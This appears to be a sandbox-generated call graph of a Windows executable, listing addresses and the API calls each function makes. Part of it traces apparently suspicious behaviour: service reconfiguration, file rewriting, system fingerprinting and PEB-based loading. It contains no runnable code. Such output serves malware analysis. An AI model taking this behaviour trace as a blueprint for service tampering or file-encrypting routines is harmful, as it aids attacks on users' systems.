407f27 59 API calls 110472->110473 110473->110470 110474->110470 110524 404c03 110475->110524 110478 404bdc 110479 404bf5 110478->110479 110480 404bec FreeLibrary 110478->110480 110482 42525b 110479->110482 110480->110479 110481 404c03 2 API calls 110481->110478 110528 425270 110482->110528 110484 404dfc 110484->110262 110484->110263 110609 404c36 110485->110609 110488 404b8f 110490 404ba1 FreeLibrary 110488->110490 110491 404baa 110488->110491 110489 404c36 2 API calls 110489->110488 110490->110491 110492 404c70 110491->110492 110493 420db6 Mailbox 59 API calls 110492->110493 110494 404c85 110493->110494 110613 40522e 110494->110613 110496 404c91 _memmove 110497 404ccc 110496->110497 110498 404dc1 110496->110498 110499 404d89 110496->110499 110500 404ec7 69 API calls 110497->110500 110627 46991b 95 API calls 110498->110627 110616 404e89 CreateStreamOnHGlobal 110499->110616 110508 404cd5 110500->110508 110503 404f0b 74 API calls 110503->110508 110504 404d69 110504->110271 110506 43d8a7 110507 404ee5 85 API calls 110506->110507 110509 43d8bb 110507->110509 110508->110503 110508->110504 110508->110506 110622 404ee5 110508->110622 110510 404f0b 74 API calls 110509->110510 110510->110504 110512 404f1d 110511->110512 110515 43d9cd 110511->110515 110651 4255e2 110512->110651 110516 469109 110671 468f5f 110516->110671 110518 46911f 110518->110278 110520 43d990 110519->110520 110521 404ed6 110519->110521 110676 425c60 110521->110676 110523 404ede 110525 404bd0 110524->110525 110526 404c0c LoadLibraryA 110524->110526 110525->110478 110525->110481 110526->110525 110527 404c1d GetProcAddress 110526->110527 110527->110525 110530 42527c __getstream 110528->110530 110529 42528f 110577 428b28 58 API calls __getptd_noexit 110529->110577 110530->110529 110532 4252c0 110530->110532 110547 4304e8 110532->110547 110533 425294 110578 428db6 9 API calls __woutput_l 110533->110578 110536 4252c5 110537 4252db 110536->110537 110538 4252ce 110536->110538 110540 425305 110537->110540 110541 4252e5 110537->110541 110579 428b28 58 API calls __getptd_noexit 110538->110579 110562 430607 110540->110562 110580 428b28 58 API calls __getptd_noexit 110541->110580 110546 42529f @_EH4_CallFilterFunc@8 __getstream 110546->110484 110548 4304f4 __getstream 110547->110548 110549 429c0b __lock 58 API calls 110548->110549 110550 430502 110549->110550 110551 43057d 110550->110551 110557 429c93 __mtinitlocknum 58 API calls 110550->110557 110560 430576 110550->110560 110585 426c50 59 API calls __lock 110550->110585 110586 426cba LeaveCriticalSection LeaveCriticalSection _doexit 110550->110586 110587 42881d 58 API calls 2 library calls 110551->110587 110554 430584 110554->110560 110588 429e2b InitializeCriticalSectionAndSpinCount 110554->110588 110555 4305f3 __getstream 110555->110536 110557->110550 110559 4305aa EnterCriticalSection 110559->110560 110582 4305fe 110560->110582 110570 430627 __wopenfile 110562->110570 110563 430641 110593 428b28 58 API calls __getptd_noexit 110563->110593 110565 430646 110594 428db6 9 API calls __woutput_l 110565->110594 110567 425310 110581 425332 LeaveCriticalSection LeaveCriticalSection _fprintf 110567->110581 110568 43085f 110590 4385a1 110568->110590 110570->110563 110576 4307fc 110570->110576 110595 4237cb 60 API calls 2 library calls 110570->110595 110572 4307f5 110572->110576 110596 4237cb 60 API calls 2 library calls 110572->110596 110574 430814 110574->110576 110597 4237cb 60 API calls 2 library calls 110574->110597 110576->110563 110576->110568 110577->110533 110578->110546 110579->110546 110580->110546 110581->110546 110589 429d75 LeaveCriticalSection 110582->110589 110584 430605 110584->110555 110585->110550 110586->110550 110587->110554 110588->110559 110589->110584 110598 437d85 110590->110598 110592 4385ba 110592->110567 110593->110565 110594->110567 110595->110572 110596->110574 110597->110576 110600 437d91 __getstream 110598->110600 110599 437da7 110601 428b28 __woutput_l 58 API calls 110599->110601 110600->110599 110603 437ddd 110600->110603 110602 437dac 110601->110602 110604 428db6 __woutput_l 9 API calls 110602->110604 110605 437e4e __wsopen_nolock 109 API calls 110603->110605 110608 437db6 __getstream 110604->110608 110606 437df9 110605->110606 110607 437e22 __wsopen_helper LeaveCriticalSection 110606->110607 110607->110608 110608->110592 110610 404b83 110609->110610 110611 404c3f LoadLibraryA 110609->110611 110610->110488 110610->110489 110611->110610 110612 404c50 GetProcAddress 110611->110612 110612->110610 110614 420db6 Mailbox 59 API calls 110613->110614 110615 405240 110614->110615 110615->110496 110617 404ea3 FindResourceExW 110616->110617 110621 404ec0 110616->110621 110618 43d933 LoadResource 110617->110618 110617->110621 110619 43d948 SizeofResource 110618->110619 110618->110621 110620 43d95c LockResource 110619->110620 110619->110621 110620->110621 110621->110497 110623 404ef4 110622->110623 110626 43d9ab 110622->110626 110628 42584d 110623->110628 110625 404f02 110625->110508 110627->110497 110629 425859 __getstream 110628->110629 110630 42586b 110629->110630 110632 425891 110629->110632 110641 428b28 58 API calls __getptd_noexit 110630->110641 110643 426c11 110632->110643 110633 425870 110642 428db6 9 API calls __woutput_l 110633->110642 110638 4258a6 110650 4258c8 LeaveCriticalSection LeaveCriticalSection _fprintf 110638->110650 110640 42587b __getstream 110640->110625 110641->110633 110642->110640 110644 426c43 EnterCriticalSection 110643->110644 110645 426c21 110643->110645 110647 425897 110644->110647 110645->110644 110646 426c29 110645->110646 110648 429c0b __lock 58 API calls 110646->110648 110649 4257be 83 API calls 5 library calls 110647->110649 110648->110647 110649->110638 110650->110640 110654 4255fd 110651->110654 110653 404f2e 110653->110516 110655 425609 __getstream 110654->110655 110656 42561f _memset 110655->110656 110657 42564c 110655->110657 110659 425644 __getstream 110655->110659 110667 428b28 58 API calls __getptd_noexit 110656->110667 110658 426c11 __lock_file 59 API calls 110657->110658 110660 425652 110658->110660 110659->110653 110669 42541d 72 API calls 6 library calls 110660->110669 110663 425639 110668 428db6 9 API calls __woutput_l 110663->110668 110664 425668 110670 425686 LeaveCriticalSection LeaveCriticalSection _fprintf 110664->110670 110667->110663 110668->110659 110669->110664 110670->110659 110674 42520a GetSystemTimeAsFileTime 110671->110674 110673 468f6e 110673->110518 110675 425238 __aulldiv 110674->110675 110675->110673 110677 425c6c __getstream 110676->110677 110678 425c93 110677->110678 110679 425c7e 110677->110679 110681 426c11 __lock_file 59 API calls 110678->110681 110690 428b28 58 API calls __getptd_noexit 110679->110690 110683 425c99 110681->110683 110682 425c83 110691 428db6 9 API calls __woutput_l 110682->110691 110692 4258d0 67 API calls 5 library calls 110683->110692 110686 425ca4 110693 425cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 110686->110693 110687 425c8e __getstream 110687->110523 110689 425cb6 110689->110687 110690->110682 110691->110687 110692->110686 110693->110689 110695 4078b7 110694->110695 110696 40785a 110694->110696 110698 407d2c 59 API calls 110695->110698 110696->110695 110697 407865 110696->110697 110699 407880 110697->110699 110700 43eb09 110697->110700 110704 407888 _memmove 110698->110704 110716 407f27 110699->110716 110720 408029 110700->110720 110703 43eb13 110705 420db6 Mailbox 59 API calls 110703->110705 110704->110306 110706 43eb33 110705->110706 110708 407d3a 110707->110708 110710 407d43 _memmove 110707->110710 110709 407e4f 59 API calls 110708->110709 110708->110710 110709->110710 110710->110298 110712 407da6 110711->110712 110714 407d99 110711->110714 110713 420db6 Mailbox 59 API calls 110712->110713 110713->110714 110714->110299 110715->110327 110717 407f39 110716->110717 110718 407f3f 110716->110718 110717->110704 110719 420db6 Mailbox 59 API calls 110718->110719 110719->110717 110721 420db6 Mailbox 59 API calls 110720->110721 110722 408033 110721->110722 110722->110703 110724 407a5f 110723->110724 110728 407a85 _memmove 110723->110728 110725 420db6 Mailbox 59 API calls 110724->110725 110724->110728 110726 407ad4 110725->110726 110727 420db6 Mailbox 59 API calls 110726->110727 110727->110728 110728->110340 110729->110341 110730->110383 110731->110385 110732->110435 110734 42486f __getstream 110733->110734 110735 42489d __getstream 110734->110735 110736 4248a5 110734->110736 110737 42488d 110734->110737 110735->110447 110813 428b28 58 API calls __getptd_noexit 110737->110813 110747 4253b2 __getstream 110746->110747 110767 469748 __tzset_nolock _wcscmp 110762->110767 110763 469210 110763->110415 110768 4240fb 58 API calls __wsplitpath_helper 110763->110768 110764 404f0b 74 API calls 110764->110767 110765 469109 GetSystemTimeAsFileTime 110765->110767 110766 404ee5 85 API calls 110766->110767 110767->110763 110767->110764 110767->110765 110767->110766 110768->110418 110769->110427 111084->110455 111086 407c5f __wsetenvp 111085->111086 111087 408029 59 API calls 111086->111087 111088 407c70 _memmove 111086->111088 111089 43ed07 _memmove 111087->111089 111088->110462 111116 407a16 111090->111116 111092 40646a 111123 40750f 111092->111123 111094 406484 Mailbox 111094->110200 111097 40750f 59 API calls 111109 406265 111097->111109 111098 43dff6 111133 45f8aa 91 API calls 4 library calls 111098->111133 111102 407d8c 59 API calls 111102->111109 111103 43e004 111104 40750f 59 API calls 111103->111104 111106 43e01a 111104->111106 111105 406799 _memmove 111134 45f8aa 91 API calls 4 library calls 111105->111134 111106->111094 111107 43df92 111108 408029 59 API calls 111107->111108 111111 43df9d 111108->111111 111109->111092 111109->111097 111109->111098 111109->111102 111109->111105 111109->111107 111112 407e4f 59 API calls 111109->111112 111121 405f6c 60 API calls 111109->111121 111122 405d41 59 API calls Mailbox 111109->111122 111131 405e72 60 API calls 111109->111131 111132 407924 59 API calls 2 library calls 111109->111132 111114 420db6 Mailbox 59 API calls 111111->111114 111113 40643b CharUpperBuffW 111112->111113 111113->111109 111114->111105 111115->110204 111117 420db6 Mailbox 59 API calls 111116->111117 111118 407a3b 111117->111118 111119 408029 59 API calls 111118->111119 111120 407a4a 111119->111120 111120->111109 111121->111109 111122->111109 111124 4075af 111123->111124 111127 407522 _memmove 111123->111127 111126 420db6 Mailbox 59 API calls 111124->111126 111125 420db6 Mailbox 59 API calls 111128 407529 111125->111128 111126->111127 111127->111125 111129 420db6 Mailbox 59 API calls 111128->111129 111130 407552 111128->111130 111129->111130 111130->111094 111131->111109 111132->111109 111133->111103 111134->111094 111135->110220 111136->110217 111137->110233 111138->110229 111139->110234 111140->110244 111141->110246 111142->110250 111143->109993 111144->109991 111145->109850 111146->109870 111147->109870 111148->109876 111149->109872 111150->109867 111151->109872 111152->109889 111153->109913 111154 401066 111159 40f76f 111154->111159 111156 40106c 111157 422d40 __cinit 67 API calls 111156->111157 111158 401076 111157->111158 111160 40f790 111159->111160 111192 41ff03 111160->111192 111164 40f7d7 111165 407667 59 API calls 111164->111165 111166 40f7e1 111165->111166 111167 407667 59 API calls 111166->111167 111168 40f7eb 111167->111168 111169 407667 59 API calls 111168->111169 111170 40f7f5 111169->111170 111171 407667 59 API calls 111170->111171 111172 40f833 111171->111172 111173 407667 59 API calls 111172->111173 111174 40f8fe 111173->111174 111202 415f87 111174->111202 111178 40f930 111179 407667 59 API calls 111178->111179 111180 40f93a 111179->111180 111230 41fd9e 111180->111230 111182 40f981 111183 40f991 GetStdHandle 111182->111183 111184 40f9dd 111183->111184 111185 4445ab 111183->111185 111186 40f9e5 OleInitialize 111184->111186 111185->111184 111187 4445b4 111185->111187 111186->111156 111237 466b38 64 API calls Mailbox 111187->111237 111189 4445bb 111238 467207 CreateThread 111189->111238 111191 4445c7 CloseHandle 111191->111186 111239 41ffdc 111192->111239 111195 41ffdc 59 API calls 111196 41ff45 111195->111196 111197 407667 59 API calls 111196->111197 111198 41ff51 111197->111198 111199 407bcc 59 API calls 111198->111199 111200 40f796 111199->111200 111201 420162 6 API calls 111200->111201 111201->111164 111203 407667 59 API calls 111202->111203 111204 415f97 111203->111204 111205 407667 59 API calls 111204->111205 111206 415f9f 111205->111206 111246 415a9d 111206->111246 111209 415a9d 59 API calls 111210 415faf 111209->111210 111211 407667 59 API calls 111210->111211 111212 415fba 111211->111212 111213 420db6 Mailbox 59 API calls 111212->111213 111214 40f908 111213->111214 111215 4160f9 111214->111215 111216 416107 111215->111216 111217 407667 59 API calls 111216->111217 111218 416112 111217->111218 111219 407667 59 API calls 111218->111219 111220 41611d 111219->111220 111221 407667 59 API calls 111220->111221 111222 416128 111221->111222 111223 407667 59 API calls 111222->111223 111224 416133 111223->111224 111225 415a9d 59 API calls 111224->111225 111226 41613e 111225->111226 111227 420db6 Mailbox 59 API calls 111226->111227 111228 416145 RegisterWindowMessageW 111227->111228 111228->111178 111231 45576f 111230->111231 111232 41fdae 111230->111232 111249 469ae7 60 API calls 111231->111249 111233 420db6 Mailbox 59 API calls 111232->111233 111235 41fdb6 111233->111235 111235->111182 111236 45577a 111237->111189 111238->111191 111250 4671ed 65 API calls 111238->111250 111240 407667 59 API calls 111239->111240 111241 41ffe7 111240->111241 111242 407667 59 API calls 111241->111242 111243 41ffef 111242->111243 111244 407667 59 API calls 111243->111244 111245 41ff3b 111244->111245 111245->111195 111247 407667 59 API calls 111246->111247 111248 415aa5 111247->111248 111248->111209 111249->111236 111251 b7aaf0 111252 b7ab06 111251->111252 111256 b7ab57 111252->111256 111257 b76490 111252->111257 111258 b75f10 111257->111258 111260 b75d90 111257->111260 111259 b76084 SetFilePointerEx 111258->111259 111258->111260 111259->111258 111261 bafaf0 111260->111261 111262 bafafd 111261->111262 111264 bafb84 111261->111264 111262->111264 111266 bafb2a 111262->111266 111268 bafc05 111264->111268 111272 bafbda 111264->111272 111265 bb08d6 111265->111256 111267 bb032f 111266->111267 111280 bb1a1b 21 API calls 2 library calls 111266->111280 111267->111256 111271 bafc38 111268->111271 111279 bb0fe0 21 API calls __startOneArgErrorHandling 111268->111279 111270 bafc22 111270->111256 111271->111256 111272->111271 111273 bb116e 111272->111273 111274 bb1167 111272->111274 111282 bb0fe0 21 API calls __startOneArgErrorHandling 111273->111282 111281 bb0ff7 21 API calls __startOneArgErrorHandling 111274->111281 111277 bb116c 111277->111256 111278 bb1173 111278->111256 111279->111270 111280->111265 111281->111277 111282->111278 111283 b9cbd0 111301 b9be50 _wcslen 111283->111301 111284 b9c168 111322 b9a905 LocalFree 111284->111322 111287 b9bffd StrStrIW 111287->111301 111288 b9c78e CloseServiceHandle 111288->111301 111289 b9c706 StrStrIW 111289->111301 111290 b9c72b StrStrIW 111290->111301 111292 b9bf68 StrStrIW 111292->111301 111293 b9c399 StrStrIW 111298 b9c3a9 111293->111298 111293->111301 111294 b9bf7e 111297 b9c7e4 StartServiceW 111294->111297 111296 b9c0fd CloseServiceHandle 111296->111301 111297->111301 111299 b9c36b OpenServiceW 111299->111301 111300 b9c65a ChangeServiceConfigW 111300->111301 111302 b9bfe9 111300->111302 111301->111283 111301->111284 111301->111287 111301->111288 111301->111289 111301->111290 111301->111292 111301->111293 111301->111294 111301->111296 111301->111297 111301->111299 111301->111300 111301->111302 111303 b7ce90 111301->111303 111321 b9a350 CloseServiceHandle 111301->111321 111323 b75d20 111301->111323 111314 b7cc9b _wcslen 111303->111314 111304 b7d5c5 CreateFileW 111304->111314 111305 b7d729 GetFileSizeEx 111308 b7d8a1 CloseHandle 111305->111308 111305->111314 111306 b7cc92 111306->111301 111307 b7d426 111307->111308 111309 b7d42a CloseHandle 111307->111309 111308->111314 111309->111314 111310 b7cd5c lstrcmpiW 111310->111314 111312 b75d20 VirtualAlloc VirtualFree 111312->111314 111313 b7cca0 lstrcmpiW 111313->111314 111314->111301 111314->111303 111314->111304 111314->111305 111314->111306 111314->111307 111314->111308 111314->111309 111314->111310 111314->111312 111314->111313 111316 b7d049 SetFilePointerEx 111314->111316 111317 b7d378 CloseHandle 111314->111317 111319 b7cfbb GetFileTime 111314->111319 111320 b7d903 111314->111320 111328 b78937 VirtualAlloc VirtualFree 111314->111328 111329 b78470 VirtualAlloc VirtualFree 111314->111329 111316->111314 111317->111314 111318 bafdfc 40 API calls 111318->111320 111319->111314 111320->111306 111320->111318 111321->111301 111322->111302 111325 b75d22 111323->111325 111324 b75d39 VirtualAlloc 111324->111325 111325->111301 111325->111324 111327 b75d46 VirtualFree 111325->111327 111327->111301 111328->111314 111330 44416f 111334 455fe6 111330->111334 111332 44417a 111333 455fe6 85 API calls 111332->111333 111333->111332 111335 456020 111334->111335 111340 455ff3 111334->111340 111335->111332 111336 456022 111346 409328 84 API calls Mailbox 111336->111346 111338 456027 111339 409837 84 API calls 111338->111339 111341 45602e 111339->111341 111340->111335 111340->111336 111340->111338 111343 45601a 111340->111343 111342 407b2e 59 API calls 111341->111342 111342->111335 111345 4095a0 59 API calls _wcsstr 111343->111345 111345->111335 111346->111338 111347 b75a3b 111348 b75a45 111347->111348 111349 b74f7c 111347->111349 111350 b751ae 111348->111350 111351 b75a4b CreateThread 111348->111351 111352 b75a59 RtlExitUserThread 111351->111352 111354 b75b17 111352->111354 111355 b75d20 2 API calls 111354->111355 111356 b75b3c 111355->111356 111357 b75085 111358 b7506f 111357->111358 111359 b75089 111357->111359 111362 b98550 111358->111362 111361 b75078 111363 b98556 111362->111363 111363->111362 111364 b98145 GetLastError 111363->111364 111365 b98579 FreeSid 111363->111365 111366 b97dd7 111363->111366 111369 b98bc1 GetLastError 111363->111369 111370 b98986 SetEntriesInAclW 111363->111370 111371 b97d37 111363->111371 111372 b97d30 111363->111372 111373 b9890b LocalFree 111363->111373 111374 b989cd OpenMutexW 111363->111374 111379 b98599 111363->111379 111383 b97d20 111363->111383 111385 b9896a wsprintfW 111363->111385 111386 b98953 AllocateAndInitializeSid 111363->111386 111364->111366 111365->111363 111366->111364 111367 b983fb GetUserNameW 111366->111367 111368 b98209 GetUserNameW 111366->111368 111366->111371 111366->111372 111376 b9824a GetLastError 111366->111376 111377 b9836e GetLastError 111366->111377 111378 b97d6c GetVolumeInformationW 111366->111378 111380 b97fd4 GetLastError 111366->111380 111381 b9826a 111366->111381 111366->111383 111387 b97f6b GetVolumeInformationW 111366->111387 111367->111366 111368->111366 111368->111371 111369->111363 111370->111363 111371->111361 111372->111371 111372->111378 111373->111363 111374->111361 111376->111361 111376->111366 111377->111366 111378->111361 111379->111372 111379->111385 111380->111366 111382 b97e06 GetComputerNameW 111381->111382 111382->111371 111383->111371 111383->111372 111383->111378 111383->111382 111384 b97d83 GetWindowsDirectoryW 111383->111384 111384->111371 111384->111372 111385->111372 111386->111363 111387->111366 111388 e80cdb 111389 e80ce2 111388->111389 111390 e80cea 111389->111390 111391 e80d80 111389->111391 111395 e80990 111390->111395 111408 e81630 9 API calls 111391->111408 111394 e80d67 111409 e7e380 111395->111409 111398 e80a60 CreateFileW 111404 e80a6d 111398->111404 111405 e80a2f 111398->111405 111399 e80a89 VirtualAlloc 111400 e80aaa ReadFile 111399->111400 111399->111404 111403 e80ac8 VirtualAlloc 111400->111403 111400->111404 111401 e80c8a 111401->111394 111402 e80c7c VirtualFree 111402->111401 111403->111404 111403->111405 111404->111401 111404->111402 111405->111399 111405->111404 111406 e80b90 CloseHandle 111405->111406 111407 e80ba0 VirtualFree 111405->111407 111412 e818a0 GetPEB 111405->111412 111406->111405 111407->111405 111408->111394 111414 e81840 GetPEB 111409->111414 111411 e7ea0b 111411->111405 111413 e818ca 111412->111413 111413->111398 111415 e8186a 111414->111415 111415->111411 111416 403633 111417 40366a 111416->111417 111418 4036e7 111417->111418 111419 403688 111417->111419 111420 4036e5 111417->111420 111424 4036ed 111418->111424 111425 43d0cc 111418->111425 111421 403695 111419->111421 111422 40374b PostQuitMessage 111419->111422 111423 4036ca DefWindowProcW 111420->111423 111427 4036a0 111421->111427 111428 43d154 111421->111428 111429 4036d8 111422->111429 111423->111429 111430 4036f2 111424->111430 111431 403715 SetTimer RegisterWindowMessageW 111424->111431 111471 411070 10 API calls Mailbox 111425->111471 111433 403755 111427->111433 111434 4036a8 111427->111434 111487 462527 71 API calls _memset 111428->111487 111437 4036f9 KillTimer 111430->111437 111438 43d06f 111430->111438 111431->111429 111435 40373e CreatePopupMenu 111431->111435 111432 43d0f3 111472 411093 331 API calls Mailbox 111432->111472 111461 4044a0 111433->111461 111440 4036b3 111434->111440 111441 43d139 111434->111441 111435->111429 111468 40443a Shell_NotifyIconW _memset 111437->111468 111444 43d074 111438->111444 111445 43d0a8 MoveWindow 111438->111445 111447 4036be 111440->111447 111448 43d124 111440->111448 111441->111423 111486 457c36 59 API calls Mailbox 111441->111486 111442 43d166 111442->111423 111442->111429 111449 43d097 SetFocus 111444->111449 111450 43d078 111444->111450 111445->111429 111447->111423 111473 40443a Shell_NotifyIconW _memset 111447->111473 111485 462d36 81 API calls _memset 111448->111485 111449->111429 111450->111447 111454 43d081 111450->111454 111451 40370c 111469 403114 DeleteObject DestroyWindow Mailbox 111451->111469 111470 411070 10 API calls Mailbox 111454->111470 111457 43d134 111457->111429 111459 43d118 111474 40434a 111459->111474 111462 4044b7 _memset 111461->111462 111463 404539 111461->111463 111488 40407c 111462->111488 111463->111429 111465 404522 KillTimer SetTimer 111465->111463 111466 4044de 111466->111465 111467 43d4ab Shell_NotifyIconW 111466->111467 111467->111465 111468->111451 111469->111429 111470->111429 111471->111432 111472->111447 111473->111459 111475 404375 _memset 111474->111475 111510 404182 111475->111510 111479 404430 Shell_NotifyIconW 111482 404422 111479->111482 111480 404414 Shell_NotifyIconW 111480->111482 111481 4043fa 111481->111479 111481->111480 111483 40407c 61 API calls 111482->111483 111484 404429 111483->111484 111484->111420 111485->111457 111486->111420 111487->111442 111489 404098 111488->111489 111490 40416f Mailbox 111488->111490 111491 407a16 59 API calls 111489->111491 111490->111466 111492 4040a6 111491->111492 111493 4040b3 111492->111493 111494 43d3c8 LoadStringW 111492->111494 111495 407bcc 59 API calls 111493->111495 111497 43d3e2 111494->111497 111496 4040c8 111495->111496 111496->111497 111499 4040d9 111496->111499 111498 407b2e 59 API calls 111497->111498 111504 43d3ec 111498->111504 111500 4040e3 111499->111500 111501 404174 111499->111501 111502 407b2e 59 API calls 111500->111502 111503 408047 59 API calls 111501->111503 111506 4040ed _memset _wcscpy 111502->111506 111503->111506 111505 407cab 59 API calls 111504->111505 111504->111506 111507 43d40e 111505->111507 111508 404155 Shell_NotifyIconW 111506->111508 111509 407cab 59 API calls 111507->111509 111508->111490 111509->111506 111511 43d423 111510->111511 111512 404196 111510->111512 111511->111512 111513 43d42c DestroyIcon 111511->111513 111512->111481 111514 462f94 62 API calls _W_store_winword 111512->111514 111513->111512 111514->111481 111515 427c56 111516 427c62 111515->111516 111552 429e08 GetStartupInfoW 111516->111552 111518 427c67 111554 428b7c GetProcessHeap 111518->111554 111520 427cbf 111521 427cca 111520->111521 111637 427da6 58 API calls 3 library calls 111520->111637 111555 429ae6 111521->111555 111524 427cd0 111525 427cdb __RTC_Initialize 111524->111525 111638 427da6 58 API calls 3 library calls 111524->111638 111576 42d5d2 111525->111576 111528 427cea 111529 427cf6 GetCommandLineW 111528->111529 111639 427da6 58 API calls 3 library calls 111528->111639 111595 434f23 GetEnvironmentStringsW 111529->111595 111532 427cf5 111532->111529 111535 427d10 111536 427d1b 111535->111536 111640 4230b5 58 API calls 3 library calls 111535->111640 111605 434d58 111536->111605 111539 427d21 111540 427d2c 111539->111540 111641 4230b5 58 API calls 3 library calls 111539->111641 111619 4230ef 111540->111619 111543 427d34 111544 427d3f __wwincmdln 111543->111544 111642 4230b5 58 API calls 3 library calls 111543->111642 111625 4047d0 111544->111625 111547 427d53 111548 427d62 111547->111548 111643 423358 58 API calls _doexit 111547->111643 111644 4230e0 58 API calls _doexit 111548->111644 111551 427d67 __getstream 111553 429e1e 111552->111553 111553->111518 111554->111520 111645 423187 36 API calls 2 library calls 111555->111645 111557 429aeb 111646 429d3c InitializeCriticalSectionAndSpinCount __getstream 111557->111646 111559 429af4 111647 429b5c 61 API calls 2 library calls 111559->111647 111560 429af0 111560->111559 111648 429d8a TlsAlloc 111560->111648 111563 429af9 111563->111524 111564 429b06 111564->111559 111565 429b11 111564->111565 111649 4287d5 111565->111649 111568 429b53 111657 429b5c 61 API calls 2 library calls 111568->111657 111571 429b58 111571->111524 111572 429b32 111572->111568 111573 429b38 111572->111573 111656 429a33 58 API calls 4 library calls 111573->111656 111575 429b40 GetCurrentThreadId 111575->111524 111577 42d5de __getstream 111576->111577 111578 429c0b __lock 58 API calls 111577->111578 111579 42d5e5 111578->111579 111580 4287d5 __calloc_crt 58 API calls 111579->111580 111581 42d5f6 111580->111581 111582 42d661 GetStartupInfoW 111581->111582 111583 42d601 @_EH4_CallFilterFunc@8 __getstream 111581->111583 111588 42d676 111582->111588 111590 42d7a5 111582->111590 111583->111528 111584 42d86d 111671 42d87d LeaveCriticalSection _doexit 111584->111671 111586 4287d5 __calloc_crt 58 API calls 111586->111588 111587 42d7f2 GetStdHandle 111587->111590 111588->111586 111588->111590 111591 42d6c4 111588->111591 111589 42d805 GetFileType 111589->111590 111590->111584 111590->111587 111590->111589 111670 429e2b InitializeCriticalSectionAndSpinCount 111590->111670 111591->111590 111592 42d6f8 GetFileType 111591->111592 111669 429e2b InitializeCriticalSectionAndSpinCount 111591->111669 111592->111591 111596 427d06 111595->111596 111597 434f34 111595->111597 111601 434b1b GetModuleFileNameW 111596->111601 111672 42881d 58 API calls 2 library calls 111597->111672 111599 434f5a _memmove 111600 434f70 FreeEnvironmentStringsW 111599->111600 111600->111596 111602 434b4f _wparse_cmdline 111601->111602 111604 434b8f _wparse_cmdline 111602->111604 111673 42881d 58 API calls 2 library calls 111602->111673 111604->111535 111606 434d71 __wsetenvp 111605->111606 111610 434d69 111605->111610 111607 4287d5 __calloc_crt 58 API calls 111606->111607 111615 434d9a __wsetenvp 111607->111615 111608 434df1 111609 422d55 _free 58 API calls 111608->111609 111609->111610 111610->111539 111611 4287d5 __calloc_crt 58 API calls 111611->111615 111612 434e16 111614 422d55 _free 58 API calls 111612->111614 111614->111610 111615->111608 111615->111610 111615->111611 111615->111612 111616 434e2d 111615->111616 111674 434607 58 API calls __woutput_l 111615->111674 111675 428dc6 IsProcessorFeaturePresent 111616->111675 111618 434e39 111618->111539 111620 4230fb __IsNonwritableInCurrentImage 111619->111620 111690 42a4d1 111620->111690 111622 423119 __initterm_e 111623 422d40 __cinit 67 API calls 111622->111623 111624 423138 __cinit __IsNonwritableInCurrentImage 111622->111624 111623->111624 111624->111543 111626 4047ea 111625->111626 111636 404889 111625->111636 111627 404824 IsThemeActive 111626->111627 111693 42336c 111627->111693 111631 404850 111705 4048fd SystemParametersInfoW SystemParametersInfoW 111631->111705 111633 40485c 111706 403b3a 111633->111706 111635 404864 SystemParametersInfoW 111635->111636 111636->111547 111637->111521 111638->111525 111639->111532 111643->111548 111644->111551 111645->111557 111646->111560 111647->111563 111648->111564 111650 4287dc 111649->111650 111652 428817 111650->111652 111654 4287fa 111650->111654 111658 4351f6 111650->111658 111652->111568 111655 429de6 TlsSetValue 111652->111655 111654->111650 111654->111652 111666 42a132 Sleep 111654->111666 111655->111572 111656->111575 111657->111571 111659 435201 111658->111659 111660 43521c 111658->111660 111659->111660 111661 43520d 111659->111661 111663 43522c HeapAlloc 111660->111663 111664 435212 111660->111664 111668 4233a1 DecodePointer 111660->111668 111667 428b28 58 API calls __getptd_noexit 111661->111667 111663->111660 111663->111664 111664->111650 111666->111654 111667->111664 111668->111660 111669->111591 111670->111590 111671->111583 111672->111599 111673->111604 111674->111615 111676 428dd1 111675->111676 111681 428c59 111676->111681 111680 428dec 111680->111618 111682 428c73 _memset ___raise_securityfailure 111681->111682 111683 428c93 IsDebuggerPresent 111682->111683 111689 42a155 SetUnhandledExceptionFilter UnhandledExceptionFilter 111683->111689 111685 42c5f6 __woutput_l 6 API calls 111687 428d7a 111685->111687 111686 428d57 ___raise_securityfailure 111686->111685 111688 42a140 GetCurrentProcess TerminateProcess 111687->111688 111688->111680 111689->111686 111691 42a4d4 EncodePointer 111690->111691 111691->111691 111692 42a4ee 111691->111692 111692->111622 111694 429c0b __lock 58 API calls 111693->111694 111695 423377 DecodePointer EncodePointer 111694->111695 111758 429d75 LeaveCriticalSection 111695->111758 111697 404849 111698 4233d4 111697->111698 111699 4233f8 111698->111699 111700 4233de 111698->111700 111699->111631 111700->111699 111759 428b28 58 API calls __getptd_noexit 111700->111759 111702 4233e8 111760 428db6 9 API calls __woutput_l 111702->111760 111704 4233f3 111704->111631 111705->111633 111707 403b47 __write_nolock 111706->111707 111708 407667 59 API calls 111707->111708 111709 403b51 GetCurrentDirectoryW 111708->111709 111761 403766 111709->111761 111711 403b7a IsDebuggerPresent 111712 43d272 MessageBoxA 111711->111712 111713 403b88 111711->111713 111716 43d28c 111712->111716 111714 403c61 111713->111714 111713->111716 111717 403ba5 111713->111717 111715 403c68 SetCurrentDirectoryW 111714->111715 111718 403c75 Mailbox 111715->111718 111883 407213 59 API calls Mailbox 111716->111883 111842 407285 111717->111842 111718->111635 111721 43d29c 111726 43d2b2 SetCurrentDirectoryW 111721->111726 111726->111718 111758->111697 111759->111702 111760->111704 111762 407667 59 API calls 111761->111762 111763 40377c 111762->111763 111892 403d31 111763->111892 111765 40379a 111766 404706 61 API calls 111765->111766 111767 4037ae 111766->111767 111768 407de1 59 API calls 111767->111768 111769 4037bb 111768->111769 111770 404ddd 136 API calls 111769->111770 111771 4037d4 111770->111771 111772 43d173 111771->111772 111773 4037dc Mailbox 111771->111773 111945 46955b 111772->111945 111777 408047 59 API calls 111773->111777 111776 43d192 111779 422d55 _free 58 API calls 111776->111779 111780 4037ef 111777->111780 111778 404e4a 84 API calls 111778->111776 111781 43d19f 111779->111781 111906 40928a 111780->111906 111783 404e4a 84 API calls 111781->111783 111785 43d1a8 111783->111785 111790 403ed0 59 API calls 111785->111790 111786 407de1 59 API calls 111787 403808 111786->111787 111788 4084c0 69 API calls 111787->111788 111789 40381a Mailbox 111788->111789 111792 407de1 59 API calls 111789->111792 111791 43d1c3 111790->111791 111793 403ed0 59 API calls 111791->111793 111794 403840 111792->111794 111795 43d1df 111793->111795 111796 4084c0 69 API calls 111794->111796 111797 404706 61 API calls 111795->111797 111799 40384f Mailbox 111796->111799 111798 43d204 111797->111798 111800 403ed0 59 API calls 111798->111800 111802 407667 59 API calls 111799->111802 111801 43d210 111800->111801 111803 408047 59 API calls 111801->111803 111804 40386d 